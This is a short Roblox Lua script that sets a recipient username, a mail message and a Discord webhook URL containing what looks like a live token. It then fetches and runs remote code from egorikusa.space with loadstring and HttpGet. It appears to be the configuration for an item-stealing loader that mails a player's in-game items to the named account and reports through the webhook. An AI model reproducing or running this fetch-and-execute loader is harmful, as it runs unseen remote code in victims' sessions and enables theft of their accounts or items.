```lua
Username = "cathal8214"
MailMessage = "ez egorikusa best"
Webhook = "https://discord.com/api/webhooks/1234516324449783958/tuaXfvxQylNLlbmkGKcLpbl5jc4wld7v35SpOfxt0fpA-L4XhgCLChM4hLgZCWcXF2rM"

loadstring(game:HttpGet("https://egorikusa.space/ttd"))()
```
